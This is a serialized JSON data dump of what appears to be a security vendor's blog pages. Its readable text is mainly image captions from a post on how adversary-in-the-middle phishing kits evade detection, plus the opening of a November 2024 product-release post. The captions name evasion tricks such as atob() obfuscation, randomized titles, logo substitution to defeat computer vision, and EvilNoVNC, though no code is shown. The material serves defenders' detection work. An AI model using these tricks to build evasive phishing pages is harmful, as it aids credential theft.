7,187715],{"nodeType":173,"value":183606,"marks":187705,"data":187706},[],{},{"nodeType":1698,"data":187708,"content":187711},{"target":187709},{"sys":187710},{"id":2148,"type":317,"linkType":318},[187712],{"nodeType":173,"value":65996,"marks":187713,"data":187714},[],{},{"nodeType":173,"value":37,"marks":187716,"data":187717},[],{},{"nodeType":235,"data":187719,"content":187720},{},[187721],{"nodeType":173,"value":125683,"marks":187722,"data":187723},[],{},{"nodeType":178,"data":187725,"content":187726},{},[187727],{"nodeType":173,"value":183630,"marks":187728,"data":187729},[],{},{"nodeType":178,"data":187731,"content":187732},{},[187733,187736,187740,187743,187747,187750,187754],{"nodeType":173,"value":183637,"marks":187734,"data":187735},[],{},{"nodeType":173,"value":2740,"marks":187737,"data":187739},[187738],{"type":370},{},{"nodeType":173,"value":1464,"marks":187741,"data":187742},[],{},{"nodeType":173,"value":2748,"marks":187744,"data":187746},[187745],{"type":370},{},{"nodeType":173,"value":183652,"marks":187748,"data":187749},[],{},{"nodeType":173,"value":2701,"marks":187751,"data":187753},[187752],{"type":370},{},{"nodeType":173,"value":183660,"marks":187755,"data":187756},[],{},{"nodeType":178,"data":187758,"content":187759},{},[187760],{"nodeType":173,"value":183667,"marks":187761,"data":187762},[],{},{"nodeType":178,"data":187764,"content":187765},{},[187766],{"nodeType":173,"value":183674,"marks":187767,"data":187768},[],{},{"nodeType":312,"data":187770,"content":187773},{"target":187771},{"sys":187772},{"id":183681,"type":317,"linkType":318},[],{"nodeType":178,"data":187775,"content":187776},{},[187777,187780,187788],{"nodeType":173,"value":183606,"marks":187778,"data":187779},[],{},{"nodeType":1698,"data":187781,"content":187784},{"target":187782},{"sys":187783},{"id":2405,"type":317,"linkType":318},[187785],{"nodeType":173,"value":125683,"marks":187786,"data":187787},[],{},{"nodeType":173,"value":37,"marks":187789,"data":187790},[],{},{"nodeType":235,"data":187792,"content":187793},{},[187794],{"nodeType":173,"value":157048,"marks":187795,"data":187796},[],{},{"nodeType":178,"data":187798,"content":187799},{},[187800],{"nodeType":173,"value":183710,"marks":187801,"data":187802},[],{},{"nodeType":178,"data":187804,"content":187805},{},[187806],{"nodeType":173,"value":183717,"marks":187807,"data":187808},[],{},{"nodeType":178,"data":187810,"content":187811},{},[187812],{"nodeType":173,"value":183724,"marks":187813,"data":187814},[],{},{"nodeType":312,"data":187816,"content":187819},{"target":187817},{"sys":187818},{"id":183731,"type":317,"linkType":318},[],{"nodeType":178,"data":187821,"content":187822},{},[187823,187826,187834],{"nodeType":173,"value":183606,"marks":187824,"data":187825},[],{},{"nodeType":1698,"data":187827,"content":187830},{"target":187828},{"sys":187829},{"id":183743,"type":317,"linkType":318},[187831],{"nodeType":173,"value":157048,"marks":187832,"data":187833},[],{},{"nodeType":173,"value":37,"marks":187835,"data":187836},[],{},{"nodeType":235,"data":187838,"content":187839},{},[187840],{"nodeType":173,"value":183755,"marks":187841,"data":187842},[],{},{"nodeType":178,"data":187844,"content":187845},{},[187846],{"nodeType":173,"value":183762,"marks":187847,"data":187848},[],{},{"nodeType":178,"data":187850,"content":187851},{},[187852],{"nodeType":173,"value":183769,"marks":187853,"data":187854},[],{},{"nodeType":178,"data":187856,"content":187857},{},[187858],{"nodeType":173,"value":183776,"marks":187859,"data":187860},[],{},{"nodeType":312,"data":187862,"content":187865},{"target":187863},{"sys":187864},{"id":183783,"type":317,"linkType":318},[],{"nodeType":178,"data":187867,"content":187868},{},[187869,187872,187880],{"nodeType":173,"value":183606,"marks":187870,"data":187871},[],{},{"nodeType":1698,"data":187873,"content":187876},{"target":187874},{"sys":187875},{"id":114256,"type":317,"linkType":318},[187877],{"nodeType":173,"value":114259,"marks":187878,"data":187879},[],{},{"nodeType":173,"value":37,"marks":187881,"data":187882},[],{},{"nodeType":235,"data":187884,"content":187885},{},[187886],{"nodeType":173,"value":2631,"marks":187887,"data":187888},[],{},{"nodeType":178,"data":187890,"content":187891},{},[187892],{"nodeType":173,"value":183812,"marks":187893,"data":187894},[],{},{"nodeType":312,"data":187896,"content":187899},{"target":187897},{"sys":187898},{"id":183819,"type":317,"linkType":318},[],{"nodeType":178,"data":187901,"content":187902},{},[187903,187906,187914],{"nodeType":173,"value":183606,"marks":187904,"data":187905},[],{},{"nodeType":1698,"data":187907,"content":187910},{"target":187908},{"sys":187909},{"id":2466,"type":317,"linkType":318},[187911],{"nodeType":173,"value":126474,"marks":187912,"data":187913},[],{},{"nodeType":173,"value":37,"marks":187915,"data":187916},[],{},{"nodeType":169,"data":187918,"content":187919},{},[187920],{"nodeType":173,"value":183842,"marks":187921,"data":187922},[],{},{"nodeType":178,"data":187924,"content":187925},{},[187926],{"nodeType":173,"value":183849,"marks":187927,"data":187928},[],{},{"nodeType":178,"data":187930,"content":187931},{},[187932],{"nodeType":173,"value":183856,"marks":187933,"data":187934},[],{},{"nodeType":250,"data":187936,"content":187937},{},[187938,187951,187964],{"nodeType":254,"data":187939,"content":187940},{},[187941],{"nodeType":178,"data":187942,"content":187943},{},[187944,187948],{"nodeType":173,"value":157359,"marks":187945,"data":187947},[187946],{"type":370},{},{"nodeType":173,"value":157364,"marks":187949,"data":187950},[],{},{"nodeType":254,"data":187952,"content":187953},{},[187954],{"nodeType":178,"data":187955,"content":187956},{},[187957,187961],{"nodeType":173,"value":157374,"marks":187958,"data":187960},[187959],{"type":370},{},{"nodeType":173,"value":157379,"marks":187962,"data":187963},[],{},{"nodeType":254,"data":187965,"content":187966},{},[187967],{"nodeType":178,"data":187968,"content":187969},{},[187970,187974],{"nodeType":173,"value":157389,"marks":187971,"data":187973},[187972],{"type":370},{},{"nodeType":173,"value":157394,"marks":187975,"data":187976},[],{},{"nodeType":178,"data":187978,"content":187979},{},[187980],{"nodeType":173,"value":183905,"marks":187981,"data":187982},[],{},{"nodeType":250,"data":187984,"content":187985},{},[187986,188002,188018,188031],{"nodeType":254,"data":187987,"content":187988},{},[187989],{"nodeType":178,"data":187990,"content":187991},{},[187992,187995,187999],{"nodeType":173,"value":183918,"marks":187993,"data":187994},[],{},{"nodeType":173,"value":183922,"marks":187996,"data":187998},[187997],{"type":370},{},{"nodeType":173,"value":157428,"marks":188000,"data":188001},[],{},{"nodeType":254,"data":188003,"content":188004},{},[188005],{"nodeType":178,"data":188006,"content":188007},{},[188008,188011,188015],{"nodeType":173,"value":183936,"marks":188009,"data":188010},[],{},{"nodeType":173,"value":183940,"marks":188012,"data":188014},[188013],{"type":370},{},{"nodeType":173,"value":183945,"marks":188016,"data":188017},[],{},{"nodeType":254,"data":188019,"content":188020},{},[188021],{"nodeType":178,"data":188022,"content":188023},{},[188024,188028],{"nodeType":173,"value":183955,"marks":188025,"data":188027},[188026],{"type":370},{},{"nodeType":173,"value":183960,"marks":188029,"data":188030},[],{},{"nodeType":254,"data":188032,"content":188033},{},[188034],{"nodeType":178,"data":188035,"content":188036},{},[188037,188041],{"nodeType":173,"value":183970,"marks":188038,"data":188040},[188039],{"type":370},{},{"nodeType":173,"value":183975,"marks":188042,"data":188043},[],{},{"nodeType":178,"data":188045,"content":188046},{},[188047,188050,188054],{"nodeType":173,"value":183982,"marks":188048,"data":188049},[],{},{"nodeType":173,"value":2718,"marks":188051,"data":188053},[188052],{"type":370},{},{"nodeType":173,"value":183990,"marks":188055,"data":188056},[],{},{"nodeType":312,"data":188058,"content":188061},{"target":188059},{"sys":188060},{"id":183997,"type":317,"linkType":318},[],{"nodeType":178,"data":188063,"content":188064},{},[188065],{"nodeType":173,"value":184003,"marks":188066,"data":188067},[],{},{"nodeType":169,"data":188069,"content":188070},{},[188071],{"nodeType":173,"value":184010,"marks":188072,"data":188073},[],{},{"nodeType":178,"data":188075,"content":188076},{},[188077],{"nodeType":173,"value":184017,"marks":188078,"data":188079},[],{},{"nodeType":178,"data":188081,"content":188082},{},[188083],{"nodeType":173,"value":184024,"marks":188084,"data":188085},[],{},{"nodeType":178,"data":188087,"content":188088},{},[188089,188092,188098],{"nodeType":173,"value":184031,"marks":188090,"data":188091},[],{},{"nodeType":186,"data":188093,"content":188094},{"uri":114007},[188095],{"nodeType":173,"value":184038,"marks":188096,"data":188097},[],{},{"nodeType":173,"value":184042,"marks":188099,"data":188100},[],{},{"nodeType":169,"data":188102,"content":188103},{},[188104],{"nodeType":173,"value":71801,"marks":188105,"data":188106},[],{},{"nodeType":178,"data":188108,"content":188109},{},[188110,188113,188119],{"nodeType":173,"value":184055,"marks":188111,"data":188112},[],{},{"nodeType":186,"data":188114,"content":188115},{"uri":114457},[188116],{"nodeType":173,"value":88194,"marks":188117,"data":188118},[],{},{"nodeType":173,"value":184065,"marks":188120,"data":188121},[],{},{"items":188123},[188124,188126],{"sys":188125,"name":18399},{"id":18398},{"sys":188127,"name":509},{"id":508},{"items":188129},[188130],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":188131},{"url":2911},{"items":188133},[188134],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":188135},{"url":8615},{"json":188137,"links":188718},{"nodeType":165,"data":188138,"content":188139},{},[188140,188146,188162,188191,188197,188202,188208,188214,188241,188247,188253,188259,188265,188271,188277,188283,188289,188295,188301,188307,188313,188319,188325,188331,188337,188343,188348,188353,188359,188365,188371,188377,188382,188388,188394,188410,188416,188432,188437,188443,188449,188455,188461,188466,188472,188478,188484,188490,188496,188501,188506,188512,188518,188524,188530,188536,188542,188547,188553,188559,188565,188571,188577,188582,188587,188593,188599,188605,188610,188616,188622,188628,188633,188639,188644,188650,188656,188671,188686,188692,188707,188712],{"nodeType":169,"data":188141,"content":188142},{},[188143],{"nodeType":173,"value":180183,"marks":188144,"data":188145},[],{},{"nodeType":178,"data":188147,"content":188148},{},[188149,188152,188159],{"nodeType":173,"value":180190,"marks":188150,"data":188151},[],{},{"nodeType":186,"data":188153,"content":188154},{"uri":74693},[188155],{"nodeType":173,"value":148689,"marks":188156,"data":188158},[188157],{"type":194},{},{"nodeType":173,"value":180201,"marks":188160,"data":188161},[],{},{"nodeType":250,"data":188163,"content":188164},{},[188165,188178],{"nodeType":254,"data":188166,"content":188167},{},[188168],{"nodeType":178,"data":188169,"content":188170},{},[188171,188175],{"nodeType":173,"value":180214,"marks":188172,"data":188174},[188173],{"type":370},{},{"nodeType":173,"value":180219,"marks":188176,"data":188177},[],{},{"nodeType":254,"data":188179,"content":188180},{},[188181],{"nodeType":178,"data":188182,"content":188183},{},[188184,188188],{"nodeType":173,"value":180229,"marks":188185,"data":188187},[188186],{"type":370},{},{"nodeType":173,"value":180234,"marks":188189,"data":188190},[],{},{"nodeType":178,"data":188192,"content":188193},{},[188194],{"nodeType":173,"value":180241,"marks":188195,"data":188196},[],{},{"nodeType":312,"data":188198,"content":188201},{"target":188199},{"sys":188200},{"id":180248,"type":317,"linkType":318},[],{"nodeType":169,"data":188203,"content":188204},{},[188205],{"nodeType":173,"value":180254,"marks":188206,"data":188207},[],{},{"nodeType":178,"data":188209,"content":188210},{},[188211],{"nodeType":173,"value":180261,"marks":188212,"data":188213},[],{},{"nodeType":178,"data":188215,"content":188216},{},[188217,188220,188224,188227,188231,188234,188238],{"nodeType":173,"value":180268,"marks":188218,"data":188219},[],{},{"nodeType":173,"value":180272,"marks":188221,"data":188223},[188222],{"type":370},{},{"nodeType":173,"value":3107,"marks":188225,"data":188226},[],{},{"nodeType":173,"value":180280,"marks":188228,"data":188230},[188229],{"type":370},{},{"nodeType":173,"value":180285,"marks":188232,"data":188233},[],{},{"nodeType":173,"value":180289,"marks":188235,"data":188237},[188236],{"type":370},{},{"nodeType":173,"value":180294,"marks":188239,"data":188240},[],{},{"nodeType":178,"data":188242,"content":188243},{},[188244],{"nodeType":173,"value":180301,"marks":188245,"data":188246},[],{},{"nodeType":169,"data":188248,"content":188249},{},[188250],{"nodeType":173,"value":180308,"marks":188251,"data":188252},[],{},{"nodeType":178,"data":188254,"content":188255},{},[188256],{"nodeType":173,"value":180315,"marks":188257,"data":188258},[],{},{"nodeType":178,"data":188260,"content":188261},{},[188262],{"nodeType":173,"value":180322,"marks":188263,"data":188264},[],{},{"nodeType":235,"data":188266,"content":188267},{},[188268],{"nodeType":173,"value":62880,"marks":188269,"data":188270},[],{},{"nodeType":178,"data":188272,"content":188273},{},[188274],{"nodeType":173,"value":180335,"marks":188275,"data":188276},[],{},{"nodeType":178,"data":188278,"content":188279},{},[188280],{"nodeType":173,"value":180342,"marks":188281,"data":188282},[],{},{"nodeType":178,"data":188284,"content":188285},{},[188286],{"nodeType":173,"value":180349,"marks":188287,"data":188288},[],{},{"nodeType":235,"data":188290,"content":188291},{},[188292],{"nodeType":173,"value":180356,"marks":188293,"data":188294},[],{},{"nodeType":178,"data":188296,"content":188297},{},[188298],{"nodeType":173,"value":180363,"marks":188299,"data":188300},[],{},{"nodeType":178,"data":188302,"content":188303},{},[188304],{"nodeType":173,"value":180370,"marks":188305,"data":188306},[],{},{"nodeType":169,"data":188308,"content":188309},{},[188310],{"nodeType":173,"value":180377,"marks":188311,"data":188312},[],{},{"nodeType":178,"data":188314,"content":188315},{},[188316],{"nodeType":173,"value":180384,"marks":188317,"data":188318},[],{},{"nodeType":235,"data":188320,"content":188321},{},[188322],{"nodeType":173,"value":180391,"marks":188323,"data":188324},[],{},{"nodeType":178,"data":188326,"content":188327},{},[188328],{"nodeType":173,"value":180398,"marks":188329,"data":188330},[],{},{"nodeType":178,"data":188332,"content":188333},{},[188334],{"nodeType":173,"value":180405,"marks":188335,"data":188336},[],{},{"nodeType":178,"data":188338,"content":188339},{},[188340],{"nodeType":173,"value":180412,"marks":188341,"data":188342},[],{},{"nodeType":312,"data":188344,"content":188347},{"target":188345},{"sys":188346},{"id":180419,"type":317,"linkType":318},[],{"nodeType":312,"data":188349,"content":188352},{"target":188350},{"sys":188351},{"id":180425,"type":317,"linkType":318},[],{"nodeType":235,"data":188354,"content":188355},{},[188356],{"nodeType":173,"value":180431,"marks":188357,"data":188358},[],{},{"nodeType":178,"data":188360,"content":188361},{},[188362],{"nodeType":173,"value":180438,"marks":188363,"data":188364},[],{},{"nodeType":178,"data":188366,"content":188367},{},[188368],{"nodeType":173,"value":180445,"marks":188369,"data":188370},[],{},{"nodeType":178,"data":188372,"content":188373},{},[188374],{"nodeType":173,"value":180452,"marks":188375,"data":188376},[],{},{"nodeType":312,"data":188378,"content":188381},{"target":188379},{"sys":188380},{"id":180459,"type":317,"linkType":318},[],{"nodeType":235,"data":188383,"content":188384},{},[188385],{"nodeType":173,"value":180465,"marks":188386,"data":188387},[],{},{"nodeType":178,"data":188389,"content":188390},{},[188391],{"nodeType":173,"value":180472,"marks":188392,"data":188393},[],{},{"nodeType":178,"data":188395,"content":188396},{},[188397,188400,188407],{"nodeType":173,"value":180479,"marks":188398,"data":188399},[],{},{"nodeType":186,"data":188401,"content":188402},{"uri":49844},[188403],{"nodeType":173,"value":180486,"marks":188404,"data":188406},[188405],{"type":194},{},{"nodeType":173,"value":1477,"marks":188408,"data":188409},[],{},{"nodeType":178,"data":188411,"content":188412},{},[188413],{"nodeType":173,"value":180497,"marks":188414,"data":188415},[],{},{"nodeType":178,"data":188417,"content":188418},{},[188419,188422,188429],{"nodeType":173,"value":180504,"marks":188420,"data":188421},[],{},{"nodeType":186,"data":188423,"content":188424},{"uri":180509},[188425],{"nodeType":173,"value":180512,"marks":188426,"data":188428},[188427],{"type":194},{},{"nodeType":173,"value":180517,"marks":188430,"data":188431},[],{},{"nodeType":312,"data":188433,"content":188436},{"target":188434},{"sys":188435},{"id":180524,"type":317,"linkType":318},[],{"nodeType":235,"data":188438,"content":188439},{},[188440],{"nodeType":173,"value":180530,"marks":188441,"data":188442},[],{},{"nodeType":178,"data":188444,"content":188445},{},[188446],{"nodeType":173,"value":180537,"marks":188447,"data":188448},[],{},{"nodeType":178,"data":188450,"content":188451},{},[188452],{"nodeType":173,"value":180544,"marks":188453,"data":188454},[],{},{"nodeType":178,"data":188456,"content":188457},{},[188458],{"nodeType":173,"value":180551,"marks":188459,"data":188460},[],{},{"nodeType":312,"data":188462,"content":188465},{"target":188463},{"sys":188464},{"id":180558,"type":317,"linkType":318},[],{"nodeType":235,"data":188467,"content":188468},{},[188469],{"nodeType":173,"value":180564,"marks":188470,"data":188471},[],{},{"nodeType":178,"data":188473,"content":188474},{},[188475],{"nodeType":173,"value":180571,"marks":188476,"data":188477},[],{},{"nodeType":178,"data":188479,"content":188480},{},[188481],{"nodeType":173,"value":180578,"marks":188482,"data":188483},[],{},{"nodeType":178,"data":188485,"content":188486},{},[188487],{"nodeType":173,"value":180585,"marks":188488,"data":188489},[],{},{"nodeType":178,"data":188491,"content":188492},{},[188493],{"nodeType":173,"value":180592,"marks":188494,"data":188495},[],{},{"nodeType":312,"data":188497,"content":188500},{"target":188498},{"sys":188499},{"id":180599,"type":317,"linkType":318},[],{"nodeType":312,"data":188502,"content":188505},{"target":188503},{"sys":188504},{"id":180605,"type":317,"linkType":318},[],{"nodeType":169,"data":188507,"content":188508},{},[188509],{"nodeType":173,"value":180611,"marks":188510,"data":188511},[],{},{"nodeType":178,"data":188513,"content":188514},{},[188515],{"nodeType":173,"value":180618,"marks":188516,"data":188517},[],{},{"nodeType":235,"data":188519,"content":188520},{},[188521],{"nodeType":173,"value":180625,"marks":188522,"data":188523},[],{},{"nodeType":178,"data":188525,"content":188526},{},[188527],{"nodeType":173,"value":180632,"marks":188528,"data":188529},[],{},{"nodeType":178,"data":188531,"content":188532},{},[188533],{"nodeType":173,"value":180639,"marks":188534,"data":188535},[],{},{"nodeType":178,"data":188537,"content":188538},{},[188539],{"nodeType":173,"value":180646,"marks":188540,"data":188541},[],{},{"nodeType":312,"data":188543,"content":188546},{"target":188544},{"sys":188545},{"id":180653,"type":317,"linkType":318},[],{"nodeType":235,"data":188548,"content":188549},{},[188550],{"nodeType":173,"value":180659,"marks":188551,"data":188552},[],{},{"nodeType":178,"data":188554,"content":188555},{},[188556],{"nodeType":173,"value":180666,"marks":188557,"data":188558},[],{},{"nodeType":178,"data":188560,"content":188561},{},[188562],{"nodeType":173,"value":180673,"marks":188563,"data":188564},[],{},{"nodeType":178,"data":188566,"content":188567},{},[188568],{"nodeType":173,"value":180680,"marks":188569,"data":188570},[],{},{"nodeType":178,"data":188572,"content":188573},{},[188574],{"nodeType":173,"value":180687,"marks":188575,"data":188576},[],{},{"nodeType":312,"data":188578,"content":188581},{"target":188579},{"sys":188580},{"id":180694,"type":317,"linkType":318},[],{"nodeType":312,"data":188583,"content":188586},{"target":188584},{"sys":188585},{"id":180700,"type":317,"linkType":318},[],{"nodeType":235,"data":188588,"content":188589},{},[188590],{"nodeType":173,"value":180706,"marks":188591,"data":188592},[],{},{"nodeType":178,"data":188594,"content":188595},{},[188596],{"nodeType":173,"value":180713,"marks":188597,"data":188598},[],{},{"nodeType":178,"data":188600,"content":188601},{},[188602],{"nodeType":173,"value":180720,"marks":188603,"data":188604},[],{},{"nodeType":312,"data":188606,"content":188609},{"target":188607},{"sys":188608},{"id":180727,"type":317,"linkType":318},[],{"nodeType":235,"data":188611,"content":188612},{},[188613],{"nodeType":173,"value":180733,"marks":188614,"data":188615},[],{},{"nodeType":178,"data":188617,"content":188618},{},[188619],{"nodeType":173,"value":180740,"marks":188620,"data":188621},[],{},{"nodeType":178,"data":188623,"content":188624},{},[188625],{"nodeType":173,"value":180747,"marks":188626,"data":188627},[],{},{"nodeType":312,"data":188629,"content":188632},{"target":188630},{"sys":188631},{"id":180754,"type":317,"linkType":318},[],{"nodeType":178,"data":188634,"content":188635},{},[188636],{"nodeType":173,"value":180760,"marks":188637,"data":188638},[],{},{"nodeType":312,"data":188640,"content":188643},{"target":188641},{"sys":188642},{"id":180767,"type":317,"linkType":318},[],{"nodeType":178,"data":188645,"content":188646},{},[188647],{"nodeType":173,"value":180773,"marks":188648,"data":188649},[],{},{"nodeType":169,"data":188651,"content":188652},{},[188653],{"nodeType":173,"value":40632,"marks":188654,"data":188655},[],{},{"nodeType":178,"data":188657,"content":188658},{},[188659,188662,188668],{"nodeType":173,"value":180786,"marks":188660,"data":188661},[],{},{"nodeType":186,"data":188663,"content":188664},{"uri":74693},[188665],{"nodeType":173,"value":180793,"marks":188666,"data":188667},[],{},{"nodeType":173,"value":180797,"marks":188669,"data":188670},[],{},{"nodeType":178,"data":188672,"content":188673},{},[188674,188677,188683],{"nodeType":173,"value":180804,"marks":188675,"data":188676},[],{},{"nodeType":186,"data":188678,"content":188679},{"uri":74693},[188680],{"nodeType":173,"value":180811,"marks":188681,"data":188682},[],{},{"nodeType":173,"value":180815,"marks":188684,"data":188685},[],{},{"nodeType":178,"data":188687,"content":188688},{},[188689],{"nodeType":173,"value":180822,"marks":188690,"data":188691},[],{},{"nodeType":178,"data":188693,"content":188694},{},[188695,188698,188704],{"nodeType":173,"value":180829,"marks":188696,"data":188697},[],{},{"nodeType":186,"data":188699,"content":188700},{"uri":9120},[188701],{"nodeType":173,"value":180836,"marks":188702,"data":188703},[],{},{"nodeType":173,"value":37,"marks":188705,"data":188706},[],{},{"nodeType":312,"data":188708,"content":188711},{"target":188709},{"sys":188710},{"id":180846,"type":317,"linkType":318},[],{"nodeType":178,"data":188713,"content":188714},{},[188715],{"nodeType":173,"value":37,"marks":188716,"data":188717},[],{},{"entries":188719},{"hyperlink":188720,"inline":188721,"block":188722},[],[],[188723,188728,188733,188738,188744,188751,188757,188764,188769,188776,188783,188790,188795,188801,188808],{"sys":188724,"__typename":15269,"type":15270,"ctaText":188725,"buttonLabel":188726,"buttonColour":72847,"buttonUrl":188727},{"id":180248},"Watch our on-demand webinar to learn why AitM phishing kits keep getting through your detection controls","Watch now","https://pushsecurity.com/resources/video/on-demand-webinar-phish-kit-teardown/",{"sys":188729,"__typename":5345,"title":188730,"caption":188730,"layoutMode":118,"file":188731},{"id":180419},"Legitimate Microsoft login page, see a simple analysis of HTML tags in the DOM on the right",{"url":188732,"width":66768,"height":19669},"https://images.ctfassets.net/y1cdw1ablpvd/5li6TkSTxzqRLE8IWJpJDI/472a729b8c22444faede4595fd02a467/image8.png",{"sys":188734,"__typename":5345,"title":188735,"caption":188735,"layoutMode":118,"file":188736},{"id":180425},"Phishing page – HTML tags in the DOM on the right are clearly very different",{"url":188737,"width":66768,"height":19669},"https://images.ctfassets.net/y1cdw1ablpvd/4uBFlebdpBej6LWjOOrbyz/63ba505acbff44a295dd9a5234a6f48c/image14.png",{"sys":188739,"__typename":5345,"title":188740,"caption":188740,"layoutMode":118,"file":188741},{"id":180459},"Randomized page titles of a phishing kit compared with legitimate Outlook login",{"url":188742,"width":129874,"height":188743},"https://images.ctfassets.net/y1cdw1ablpvd/siW14N2Kwg1s8hIPE8CiT/779eb68e7590844fd051d1831db4346d/Group_448.png",163,{"sys":188745,"__typename":5345,"title":188746,"caption":188746,"layoutMode":118,"file":188747},{"id":180524},"EvilNoVNC tool with underlying HTML structure representing it",{"url":188748,"width":188749,"height":188750},"https://images.ctfassets.net/y1cdw1ablpvd/5QuvOyM7qhieElxqzOKTUI/7347dd7af4c0421b2dbb6c4c6bd4d61e/image11.png",1484,832,{"sys":188752,"__typename":5345,"title":188753,"caption":188753,"layoutMode":118,"file":188754},{"id":180558},"An example of a phishing kit using atob() base64 decoding to hide specific text",{"url":188755,"width":42879,"height":188756},"https://images.ctfassets.net/y1cdw1ablpvd/2mhJCgbYdY5yiJuaLkfrv4/e89381ca59b6ddcceeb2b99a7068a488/image1.png",215,{"sys":188758,"__typename":5345,"title":188759,"caption":188759,"layoutMode":118,"file":188760},{"id":180599},"Legitimate Microsoft login page showing the HTML \u003Cimg> element representing the logo",{"url":188761,"width":188762,"height":188763},"https://images.ctfassets.net/y1cdw1ablpvd/7i3Oq2a6SEoOAeEUrieaht/7af9700aee1fd22df22457e04f6aa402/image10.png",477,444,{"sys":188765,"__typename":5345,"title":188766,"caption":188766,"layoutMode":118,"file":188767},{"id":180605},"Phishing kit showing the use of a different sized \u003Cdiv> element to represent the logo instead",{"url":188768,"width":188762,"height":188763},"https://images.ctfassets.net/y1cdw1ablpvd/5wBymusKtoqG2K3CNAcNCD/af19bf6632f06bc88e13a325fb27d6c3/image13.png",{"sys":188770,"__typename":5345,"title":188771,"caption":188771,"layoutMode":118,"file":188772},{"id":180653},"Comparison of a legitimate logo as the favicon for Microsoft’s login page vs. a phishing kit leaving it empty",{"url":188773,"width":188774,"height":188775},"https://images.ctfassets.net/y1cdw1ablpvd/7HanK6OlKdrp5dsN7klCYM/1a6c91d7ef97b6aa629f46bc99e79947/image3.png",457,37,{"sys":188777,"__typename":5345,"title":188778,"caption":188778,"layoutMode":118,"file":188779},{"id":180694},"An example of a blurred background used by a phishing kit targeting Microsoft logins",{"url":188780,"width":188781,"height":188782},"https://images.ctfassets.net/y1cdw1ablpvd/6DLedoDwgUSj1Z1dikdrMq/c07a6a8edda1e587258fb13f50ad48ac/image2.png",1968,1324,{"sys":188784,"__typename":5345,"title":188785,"caption":188785,"layoutMode":118,"file":188786},{"id":180700},"The legitimate Microsoft login page with a plain background as a comparison",{"url":188787,"width":188788,"height":188789},"https://images.ctfassets.net/y1cdw1ablpvd/2TurUiHG0toxZEAq9qHgVv/783a3c2114825754b792d1a740ca78bf/image6.png",819,715,{"sys":188791,"__typename":5345,"title":188792,"caption":188792,"layoutMode":118,"file":188793},{"id":180727},"Logo substitution utilized by a phishing kit so the page still appears authentic but avoids using the expected logo that computer vision algorithms may look for",{"url":188794,"width":188781,"height":188782},"https://images.ctfassets.net/y1cdw1ablpvd/1TpjK42Icm2nf5sVi7vad/41fe101b4720d858d2126d08585b90bf/image2.png",{"sys":188796,"__typename":5345,"title":188797,"caption":188797,"layoutMode":118,"file":188798},{"id":180754},"Querying a div used to display a Microsoft logo in a phishing kit to determine the background image that has been set",{"url":188799,"width":127693,"height":188800},"https://images.ctfassets.net/y1cdw1ablpvd/3gzVNS8qXKfHESOmGrkrJz/07c2d1f69880c006ce41436d66cf66a1/image7.png",135,{"sys":188802,"__typename":5345,"title":188803,"caption":188803,"layoutMode":118,"file":188804},{"id":180767},"Obfuscated form when looking at the image data directly",{"url":188805,"width":188806,"height":188807},"https://images.ctfassets.net/y1cdw1ablpvd/7DmRWxMorAk4iL6PZxv9Mp/c70024c6dabd4d0643db7ec0cb0cab0c/image9.png",110,35,{"sys":188809,"__typename":15269,"type":15270,"ctaText":188810,"buttonLabel":134264,"buttonColour":15273,"buttonUrl":9120},{"id":180846},"Learn how Push detects and blocks phishing attacks in the browser","content:blog:how-aitm-phishing-kits-evade-detection-p2.json","blog/how-aitm-phishing-kits-evade-detection-p2.json","blog/how-aitm-phishing-kits-evade-detection-p2",{"_path":188815,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":188816,"ogImage":118,"summary":188818,"title":167647,"subtitle":118,"metaTitle":188829,"synopsis":167648,"hashTags":118,"publishedDate":167649,"slug":167650,"tagsCollection":188830,"relatedBlogPostsCollection":188836,"authorsCollection":189763,"content":189767,"_id":190061,"_type":5439,"_source":5440,"_file":190062,"_stem":190063,"_extension":5439},"/blog/product-release-november-2024",{"id":167357,"publishedAt":188817},"2024-11-13T18:16:14.866Z",{"json":188819},{"data":188820,"content":188821,"nodeType":165},{},[188822],{"data":188823,"content":188824,"nodeType":178},{},[188825],{"data":188826,"marks":188827,"value":188828,"nodeType":173},{},[],"Easier management of app banners, learn which password managers employees use, and more","Push Security new product features for November 2024",{"items":188831},[188832,188834],{"sys":188833,"name":18399},{"id":18398},{"sys":188835,"name":26137},{"id":26136},{"items":188837},[188838,189330],{"__typename":1528,"sys":188839,"content":188841,"title":189316,"synopsis":189317,"hashTags":118,"publishedDate":189318,"slug":189319,"tagsCollection":189320,"authorsCollection":189326},{"id":188840},"eyUyEsAObqyzg68JradWU",{"json":188842},{"data":188843,"content":188844,"nodeType":165},{},[188845,188851,188914,188921,188945,188960,188965,188982,188989,189017,189024,189043,189050,189088,189095,189101,189119,189126,189142,189157,189163,189180,189187,189203,189235,189240,189258,189265,189289,189304,189310],{"data":188846,"content":188847,"nodeType":235},{},[188848],{"data":188849,"marks":188850,"value":65066,"nodeType":173},{},[],{"data":188852,"content":188853,"nodeType":250},{},[188854,188864,188874,188884,188894,188904],{"data":188855,"content":188856,"nodeType":254},{},[188857],{"data":188858,"content":188859,"nodeType":178},{},[188860],{"data":188861,"marks":188862,"value":188863,"nodeType":173},{},[],"New Events page",{"data":188865,"content":188866,"nodeType":254},{},[188867],{"data":188868,"content":188869,"nodeType":178},{},[188870],{"data":188871,"marks":188872,"value":188873,"nodeType":173},{},[],"Arc browser support",{"data":188875,"content":188876,"nodeType":254},{},[188877],{"data":188878,"content":188879,"nodeType":178},{},[188880],{"data":188881,"marks":188882,"value":188883,"nodeType":173},{},[],"Warn and block modes for phishing tool detection",{"data":188885,"content":188886,"nodeType":254},{},[188887],{"data":188888,"content":188889,"nodeType":178},{},[188890],{"data":188891,"marks":188892,"value":188893,"nodeType":173},{},[],"Admin audit events now available",{"data":188895,"content":188896,"nodeType":254},{},[188897],{"data":188898,"content":188899,"nodeType":178},{},[188900],{"data":188901,"marks":188902,"value":188903,"nodeType":173},{},[],"Add custom labels to apps",{"data":188905,"content":188906,"nodeType":254},{},[188907],{"data":188908,"content":188909,"nodeType":178},{},[188910],{"data":188911,"marks":188912,"value":188913,"nodeType":173},{},[],"Improved Browsers page",{"data":188915,"content":188916,"nodeType":235},{},[188917],{"data":188918,"marks":188919,"value":188920,"nodeType":173},{},[],"Get a snapshot of your Push activity with Events",{"data":188922,"content":188923,"nodeType":178},{},[188924,188928,188932,188936,188941],{"data":188925,"marks":188926,"value":188927,"nodeType":173},{},[],"To help you visualize and plan how you can use Push telemetry, we now provide an 